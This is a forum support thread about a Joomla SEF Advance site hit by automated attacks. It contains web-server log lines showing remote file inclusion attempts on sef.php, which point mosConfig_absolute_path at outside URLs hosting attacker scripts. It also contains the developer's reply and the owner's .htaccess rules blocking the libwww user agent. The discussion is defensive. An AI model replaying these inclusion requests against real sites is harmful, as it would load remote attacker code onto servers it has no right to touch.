1. Forum
  3. Products
  5. SEF Advance
  7. my site blocked by my provider (libwww-perl) : sef.php hacked ?

my site blocked by my provider (libwww-perl) : sef.php hacked ?

16 years 9 months ago #1749 by wadzaloo
Hi All,

sorry first for my poor english...

I am owner of a site using Joomla 1.0.12 and last version of SEF Advance. All files are the original ones in the SEF Advance package (htaccess,sef.php...)

I don't feel skilled enough to find the way to avoid this attack on my site. I just know that this script libwww-perl do not smell good
Here is a choosen extract of my logfile
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:51 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:54 +0100] "GET /bric-a-brac/section// HTTP/1.1" 404 40352 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:55 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 200 76 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:16 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/xt.gif? HTTP/1.1" 200 174 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:17 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 342 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 315 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:59 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"

Could you please help me to find the root cause of this (if sef is really the reason) and workaround ?

Thank you by advance  ;)

Please Log in or Create an account to join the conversation.

16 years 9 months ago #1751 by Saka
It is not possible to hack SEF Advance with URL exploits like this.
However, just to keep things pretty, I just added a security layer which will stop the attacker even before he can get to execution attempt, so it exits gracefully. You can download and install the latest version (5.4.6) and be sure to replace your .htaccess. This way these attacks result in forbidden error.
Emir Sakic
www.sakic.net

Please Log in or Create an account to join the conversation.

16 years 9 months ago #1754 by wadzaloo
Many Thanks !

I understand, sef is not in cause
Waiting for your answer, i have add the following lines to htaccess, comparing to your security layer is it equivalent ?
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Please Log in or Create an account to join the conversation.

  1. Forum
  3. Products
  5. SEF Advance
  7. my site blocked by my provider (libwww-perl) : sef.php hacked ?

About us

We provide high quality Joomla components created by a co-founder and original core developer of Joomla. For over a decade, our products have been used by more than 20.000 webmasters around the world.

We also recommend

Stay in touch